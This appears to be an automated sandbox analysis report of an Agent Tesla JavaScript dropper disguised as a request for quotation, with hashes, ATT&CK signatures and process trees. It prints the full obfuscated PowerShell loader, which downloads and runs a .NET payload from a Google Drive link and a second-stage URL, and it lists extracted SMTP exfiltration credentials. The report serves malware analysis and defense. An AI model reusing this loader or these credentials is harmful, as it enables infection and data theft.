Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 05:21
Static task
static1
Behavioral task
behavioral1
Sample
RFQ-CanparFFTradingCo..js
Resource
win7-20240903-en
General
-
Target
RFQ-CanparFFTradingCo..js
-
Size
180KB
-
MD5
0d3505de58b29682da0f4799e7812306
-
SHA1
9a411ead4bdbed963fdbaafd5729a77a35e63e66
-
SHA256
11d08c101934f51cee60658bbeb71a5988873bfacba3c00f25cea0bd67442926
-
SHA512
c037fef1c0ccb0fff448d0d2344c3edfc2613529ee04133a44b29ed111df9ded4b79f57057edc02c230c68827a0d2b3b1ea3f32f6ce583dd80c61a81b064ef90
-
SSDEEP
3072:94SWDYRx3twtUMy2xtn4BRGLGqlT6HYlxKm3+FmEM5SGDZx392xtn4BRGLGqlhG:xWAx3R4t4BRgjR64lIm3a1ZGdx394t4V
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Extracted
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360
Extracted
agenttesla
Protocol: smtp- Host:
smtp.yandex.com - Port:
587 - Username:
[email protected] - Password:
marcellinus360 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Blocklisted process makes network request 12 IoCs
flow pid Process 4 1376 wscript.exe 9 1376 wscript.exe 28 4680 powershell.exe 30 4680 powershell.exe 40 4680 powershell.exe 68 2232 wscript.exe 69 2232 wscript.exe 70 3588 powershell.exe 71 3588 powershell.exe 72 3588 powershell.exe 96 3836 wscript.exe 97 3836 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 3624 powershell.exe 4680 powershell.exe 3032 powershell.exe 3588 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 27 drive.google.com 28 drive.google.com 70 drive.google.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 42 api.ipify.org 43 api.ipify.org 73 api.ipify.org -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4680 set thread context of 4348 4680 powershell.exe 105 PID 3588 set thread context of 3484 3588 powershell.exe 119 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 68 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 69 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 97 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3624 powershell.exe 3624 powershell.exe 4680 powershell.exe 4680 powershell.exe 4348 CasPol.exe 4348 CasPol.exe 3032 powershell.exe 3032 powershell.exe 3588 powershell.exe 3588 powershell.exe 3484 CasPol.exe 3484 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3624 powershell.exe Token: SeDebugPrivilege 4680 powershell.exe Token: SeDebugPrivilege 4348 CasPol.exe Token: SeDebugPrivilege 3032 powershell.exe Token: SeDebugPrivilege 3588 powershell.exe Token: SeDebugPrivilege 3484 CasPol.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4348 CasPol.exe 3484 CasPol.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1376 wrote to memory of 3624 1376 wscript.exe 87 PID 1376 wrote to memory of 3624 1376 wscript.exe 87 PID 3624 wrote to memory of 4680 3624 powershell.exe 90 PID 3624 wrote to memory of 4680 3624 powershell.exe 90 PID 4680 wrote to memory of 4808 4680 powershell.exe 103 PID 4680 wrote to memory of 4808 4680 powershell.exe 103 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 4680 wrote to memory of 4348 4680 powershell.exe 105 PID 2232 wrote to memory of 3032 2232 wscript.exe 115 PID 2232 wrote to memory of 3032 2232 wscript.exe 115 PID 3032 wrote to memory of 3588 3032 powershell.exe 117 PID 3032 wrote to memory of 3588 3032 powershell.exe 117 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 PID 3588 wrote to memory of 3484 3588 powershell.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\RFQ-CanparFFTradingCo..js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAEUATgB2ADoAQwBPAE0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAEoAbwBpAE4AJwAnACkAKAAgACgAKAAnAE8AMgB2AGkAbQBhAGcAZQBVAHIAJwArACcAbAAgAD0AIABaAHoANQBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQAnACsAJwBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAWgB6ADUAOwBPADIAdgB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATwAyAHYAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABPADIAdgB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwAnACsAJwB3AG4AbABvAGEAZABEAGEAdABhACgATwAyAHYAaQBtAGEAZwBlAFUAcgBsACkAOwBPADIAdgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAJwArACcAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABPADIAdgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBPADIAdgBzAHQAYQByAHQARgBsAGEAJwArACcAZwAgACcAKwAnAD0AIABaAHoANQA8ADwAQgBBAFMARQA2ADQAXwAnACsAJwBTAFQAQQBSAFQAPgA+AFoAegA1ADsATwAyAHYAZQBuAGQARgBsAGEAZwAgAD0AIABaAHoANQA8ADwAQgBBAFMARQA2ADQAJwArACcAXwBFAE4ARAA+AD4AWgB6ADUAOwBPADIAdgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAE8AMgB2AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQB4AE8AZgAoAE8AMgB2AHMAdABhAHIAdABGAGwAYQBnACkAOwBPADIAdgBlAG4AZABJAG4AZABlAHgAIAA9ACAAJwArACcATwAyAHYAaQBtAGEAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATwAyAHYAZQBuAGQARgBsAGEAZwApADsATwAyAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABPADIAdgBlAG4AZABJAG4AZABlACcAKwAnAHgAIAAtAGcAdAAgAE8AMgB2AHMAdABhAHIAdABJAG4AZABlAHgAOwBPADIAdgBzACcAKwAnAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAATwAyAHYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AE8AMgB2AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAE8AMgB2AGUAbgBkAEkAbgBkAGUAeAAgAC0AIABPADIAdgBzAHQAYQByAHQASQBuAGQAZQB4ADsATwAyAHYAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABPADIAdgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATwAyAHYAcwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAsACAATwAyAHYAYgBhACcAKwAnAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AE8AMgB2AGIAYQBzAGUANgA0AFIAZQAnACsAJwB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAE8AMgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAMQBYAG0AIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATwAyAHYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAE8AMgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwBPADIAdgBjAG8AJwArACcAbQBtAGEAbgBkAEIAeQB0AGUAJwArACcAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGACcAKwAnAHIAbwBtAEIAYQBzACcAKwAnAGUANgA0AFMAdAByAGkAbgBnACgATwAyACcAKwAnAHYAYgBhAHMAZQA2ADQAJwArACcAUgBlAHYAZQByAHMAZQBkACkAOwBPADIAdgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQAnACsAJwBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAE8AMgB2AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBPADIAdgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkAJwArACcATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAWgB6ACcAKwAnADUAVgBBAEkAWgB6ADUAKQA7AE8AMgB2AHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABPADIAdgBuACcAKwAnAHUAbABsACwAIABAACgAWgB6ADUAdAB4AHQALgBuAGkAZwBpAHIAbwAvAHYAdwBlAG4ALwByAGIALgBtAG8AYwAuADUAMAAxAHIAZQAuAG8AbQBsAC8ALwA6AHMAcAB0AHQAaABaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwBaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwBaAHoANQAsACAAWgB6ADUAQwBhAHMAUABvAGwAWgB6ADUALAAgAFoAegA1AGQAZQBzAGEAdABpAHYAYQBkAG8AWgB6ADUALABaAHoANQBkAGUAcwBhAHQAaQB2AGEAZABvACcAKwAnAFoAegA1ACwAWgB6ACcAKwAnADUAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBaAHoANQAsAFoAegA1AFUAUgBMAFoAegA1ACwAIABaAHoANQBDADoAJwArACcAOABhAEQAUAByAG8AZwByAGEAbQBEAGEAdABhADgAYQBEAFoAegA1ACwAWgB6ADUAcABhAHQAaABvACcAKwAnAHAAJwArACcAaABvAGIAaQBhAFoAegA1ACwAWgB6ADUAagBzAFoAegA1ACwAWgB6ADUAMQBaACcAKwAnAHoANQAsAFoAegAnACsAJwA1ADEAWgB6ADUAKQApADsAJwApAC0AYwByAGUAcABMAEEAYwBFACAAJwBPADIAdgAnACwAWwBjAEgAYQByAF0AMwA2AC0AUgBFAHAATABhAGMARQAgACcAOABhAEQAJwAsAFsAYwBIAGEAcgBdADkAMgAgACAALQBSAEUAcABMAGEAYwBFACAAJwAxAFgAbQAnACwAWwBjAEgAYQByAF0AMQAyADQAIAAtAGMAcgBlAHAATABBAGMARQAnAFoAegA1ACcALABbAGMASABhAHIAXQAzADkAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $ENv:COMspec[4,26,25]-JoiN'')( (('O2vimageUr'+'l = Zz5https://drive.google.com/uc?export=download&id=1'+'AIVgJJJv1F6vS4sUOybnH-sDvUhBYwurZz5;O2vwebClient = New-Object System.Net.WebClient;O2vimageBytes = O2vwebClient.Do'+'wnloadData(O2vimageUrl);O2vimageText = [System.Tex'+'t.Encoding]::UTF8.GetString(O2vimageBytes);O2vstartFla'+'g '+'= Zz5<<BASE64_'+'START>>Zz5;O2vendFlag = Zz5<<BASE64'+'_END>>Zz5;O2vstartIndex = O2vimageTex'+'t.IndexOf(O2vstartFlag);O2vendIndex = '+'O2vimageTex'+'t.IndexOf(O2vendFlag);O2vstartIndex -ge 0 -and O2vendInde'+'x -gt O2vstartIndex;O2vs'+'tartIndex += O2vstartFlag.Length;O2vbase64Length = O2vendIndex - O2vstartIndex;O2vbase64Command = O2vimageText.Substring(O2vstartIn'+'dex, O2vba'+'se64Lengt'+'h);O2vbase64Re'+'versed = -join (O2vbase64Command.ToChar'+'Array() 1Xm ForEach-Object { O2v_ })[-1..-(O2vbase64Command.Length)];O2vco'+'mmandByte'+'s = [System.Convert]::F'+'romBas'+'e64String(O2'+'vbase64'+'Reversed);O2vloadedAssembly = [System.Re'+'flection.Assembly]::Load(O2vcommandBytes);O2vvaiMethod = [dnlib.I'+'O.Home].GetMethod(Zz'+'5VAIZz5);O2vvaiMethod.Invoke(O2vn'+'ull, @(Zz5txt.nigiro/vwen/rb.moc.501re.oml//:sptthZz5, Zz5desativado'+'Zz5, Zz5desativadoZz5, Zz5desativadoZz5, Zz5CasPolZz5, Zz5desativadoZz5,Zz5desativado'+'Zz5,Zz'+'5d'+'esativado'+'Zz5,Zz5URLZz5, Zz5C:'+'8aDProgramData8aDZz5,Zz5patho'+'p'+'hobiaZz5,Zz5jsZz5,Zz51Z'+'z5,Zz'+'51Zz5));')-crepLAcE 'O2v',[cHar]36-REpLacE '8aD',[cHar]92 -REpLacE '1Xm',[cHar]124 -crepLAcE'Zz5',[cHar]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\pathophobia.js"4⤵PID:4808
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4348
-
-
-
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\pathophobia.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAgACgAIAAkAEUATgB2ADoAQwBPAE0AcwBwAGUAYwBbADQALAAyADYALAAyADUAXQAtAEoAbwBpAE4AJwAnACkAKAAgACgAKAAnAE8AMgB2AGkAbQBhAGcAZQBVAHIAJwArACcAbAAgAD0AIABaAHoANQBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AMQAnACsAJwBBAEkAVgBnAEoASgBKAHYAMQBGADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAWgB6ADUAOwBPADIAdgB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsATwAyAHYAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABPADIAdgB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwAnACsAJwB3AG4AbABvAGEAZABEAGEAdABhACgATwAyAHYAaQBtAGEAZwBlAFUAcgBsACkAOwBPADIAdgBpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAJwArACcAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABPADIAdgBpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwBPADIAdgBzAHQAYQByAHQARgBsAGEAJwArACcAZwAgACcAKwAnAD0AIABaAHoANQA8ADwAQgBBAFMARQA2ADQAXwAnACsAJwBTAFQAQQBSAFQAPgA+AFoAegA1ADsATwAyAHYAZQBuAGQARgBsAGEAZwAgAD0AIABaAHoANQA8ADwAQgBBAFMARQA2ADQAJwArACcAXwBFAE4ARAA+AD4AWgB6ADUAOwBPADIAdgBzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgAE8AMgB2AGkAbQBhAGcAZQBUAGUAeAAnACsAJwB0AC4ASQBuAGQAZQB4AE8AZgAoAE8AMgB2AHMAdABhAHIAdABGAGwAYQBnACkAOwBPADIAdgBlAG4AZABJAG4AZABlAHgAIAA9ACAAJwArACcATwAyAHYAaQBtAGEAZwBlAFQAZQB4ACcAKwAnAHQALgBJAG4AZABlAHgATwBmACgATwAyAHYAZQBuAGQARgBsAGEAZwApADsATwAyAHYAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIABPADIAdgBlAG4AZABJAG4AZABlACcAKwAnAHgAIAAtAGcAdAAgAE8AMgB2AHMAdABhAHIAdABJAG4AZABlAHgAOwBPADIAdgBzACcAKwAnAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAATwAyAHYAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7AE8AMgB2AGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgAE8AMgB2AGUAbgBkAEkAbgBkAGUAeAAgAC0AIABPADIAdgBzAHQAYQByAHQASQBuAGQAZQB4ADsATwAyAHYAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIABPADIAdgBpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgATwAyAHYAcwB0AGEAcgB0AEkAbgAnACsAJwBkAGUAeAAsACAATwAyAHYAYgBhACcAKwAnAHMAZQA2ADQATABlAG4AZwB0ACcAKwAnAGgAKQA7AE8AMgB2AGIAYQBzAGUANgA0AFIAZQAnACsAJwB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoAE8AMgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBUAG8AQwBoAGEAcgAnACsAJwBBAHIAcgBhAHkAKAApACAAMQBYAG0AIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAATwAyAHYAXwAgAH0AKQBbAC0AMQAuAC4ALQAoAE8AMgB2AGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQALgBMAGUAbgBnAHQAaAApAF0AOwBPADIAdgBjAG8AJwArACcAbQBtAGEAbgBkAEIAeQB0AGUAJwArACcAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGACcAKwAnAHIAbwBtAEIAYQBzACcAKwAnAGUANgA0AFMAdAByAGkAbgBnACgATwAyACcAKwAnAHYAYgBhAHMAZQA2ADQAJwArACcAUgBlAHYAZQByAHMAZQBkACkAOwBPADIAdgBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQAnACsAJwBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAE8AMgB2AGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwBPADIAdgB2AGEAaQBNAGUAdABoAG8AZAAgAD0AIABbAGQAbgBsAGkAYgAuAEkAJwArACcATwAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAWgB6ACcAKwAnADUAVgBBAEkAWgB6ADUAKQA7AE8AMgB2AHYAYQBpAE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKABPADIAdgBuACcAKwAnAHUAbABsACwAIABAACgAWgB6ADUAdAB4AHQALgBuAGkAZwBpAHIAbwAvAHYAdwBlAG4ALwByAGIALgBtAG8AYwAuADUAMAAxAHIAZQAuAG8AbQBsAC8ALwA6AHMAcAB0AHQAaABaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwBaAHoANQAsACAAWgB6ADUAZABlAHMAYQB0AGkAdgBhAGQAbwBaAHoANQAsACAAWgB6ADUAQwBhAHMAUABvAGwAWgB6ADUALAAgAFoAegA1AGQAZQBzAGEAdABpAHYAYQBkAG8AWgB6ADUALABaAHoANQBkAGUAcwBhAHQAaQB2AGEAZABvACcAKwAnAFoAegA1ACwAWgB6ACcAKwAnADUAZAAnACsAJwBlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBaAHoANQAsAFoAegA1AFUAUgBMAFoAegA1ACwAIABaAHoANQBDADoAJwArACcAOABhAEQAUAByAG8AZwByAGEAbQBEAGEAdABhADgAYQBEAFoAegA1ACwAWgB6ADUAcABhAHQAaABvACcAKwAnAHAAJwArACcAaABvAGIAaQBhAFoAegA1ACwAWgB6ADUAagBzAFoAegA1ACwAWgB6ADUAMQBaACcAKwAnAHoANQAsAFoAegAnACsAJwA1ADEAWgB6ADUAKQApADsAJwApAC0AYwByAGUAcABMAEEAYwBFACAAJwBPADIAdgAnACwAWwBjAEgAYQByAF0AMwA2AC0AUgBFAHAATABhAGMARQAgACcAOABhAEQAJwAsAFsAYwBIAGEAcgBdADkAMgAgACAALQBSAEUAcABMAGEAYwBFACAAJwAxAFgAbQAnACwAWwBjAEgAYQByAF0AMQAyADQAIAAtAGMAcgBlAHAATABBAGMARQAnAFoAegA1ACcALABbAGMASABhAHIAXQAzADkAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $ENv:COMspec[4,26,25]-JoiN'')( (('O2vimageUr'+'l = Zz5https://drive.google.com/uc?export=download&id=1'+'AIVgJJJv1F6vS4sUOybnH-sDvUhBYwurZz5;O2vwebClient = New-Object System.Net.WebClient;O2vimageBytes = O2vwebClient.Do'+'wnloadData(O2vimageUrl);O2vimageText = [System.Tex'+'t.Encoding]::UTF8.GetString(O2vimageBytes);O2vstartFla'+'g '+'= Zz5<<BASE64_'+'START>>Zz5;O2vendFlag = Zz5<<BASE64'+'_END>>Zz5;O2vstartIndex = O2vimageTex'+'t.IndexOf(O2vstartFlag);O2vendIndex = '+'O2vimageTex'+'t.IndexOf(O2vendFlag);O2vstartIndex -ge 0 -and O2vendInde'+'x -gt O2vstartIndex;O2vs'+'tartIndex += O2vstartFlag.Length;O2vbase64Length = O2vendIndex - O2vstartIndex;O2vbase64Command = O2vimageText.Substring(O2vstartIn'+'dex, O2vba'+'se64Lengt'+'h);O2vbase64Re'+'versed = -join (O2vbase64Command.ToChar'+'Array() 1Xm ForEach-Object { O2v_ })[-1..-(O2vbase64Command.Length)];O2vco'+'mmandByte'+'s = [System.Convert]::F'+'romBas'+'e64String(O2'+'vbase64'+'Reversed);O2vloadedAssembly = [System.Re'+'flection.Assembly]::Load(O2vcommandBytes);O2vvaiMethod = [dnlib.I'+'O.Home].GetMethod(Zz'+'5VAIZz5);O2vvaiMethod.Invoke(O2vn'+'ull, @(Zz5txt.nigiro/vwen/rb.moc.501re.oml//:sptthZz5, Zz5desativado'+'Zz5, Zz5desativadoZz5, Zz5desativadoZz5, Zz5CasPolZz5, Zz5desativadoZz5,Zz5desativado'+'Zz5,Zz'+'5d'+'esativado'+'Zz5,Zz5URLZz5, Zz5C:'+'8aDProgramData8aDZz5,Zz5patho'+'p'+'hobiaZz5,Zz5jsZz5,Zz51Z'+'z5,Zz'+'51Zz5));')-crepLAcE 'O2v',[cHar]36-REpLacE '8aD',[cHar]92 -REpLacE '1Xm',[cHar]124 -crepLAcE'Zz5',[cHar]39))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3484
-
-
-
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\pathophobia.js1⤵
- Blocklisted process makes network request
PID:3836
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
180KB
MD50d3505de58b29682da0f4799e7812306
SHA19a411ead4bdbed963fdbaafd5729a77a35e63e66
SHA25611d08c101934f51cee60658bbeb71a5988873bfacba3c00f25cea0bd67442926
SHA512c037fef1c0ccb0fff448d0d2344c3edfc2613529ee04133a44b29ed111df9ded4b79f57057edc02c230c68827a0d2b3b1ea3f32f6ce583dd80c61a81b064ef90
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
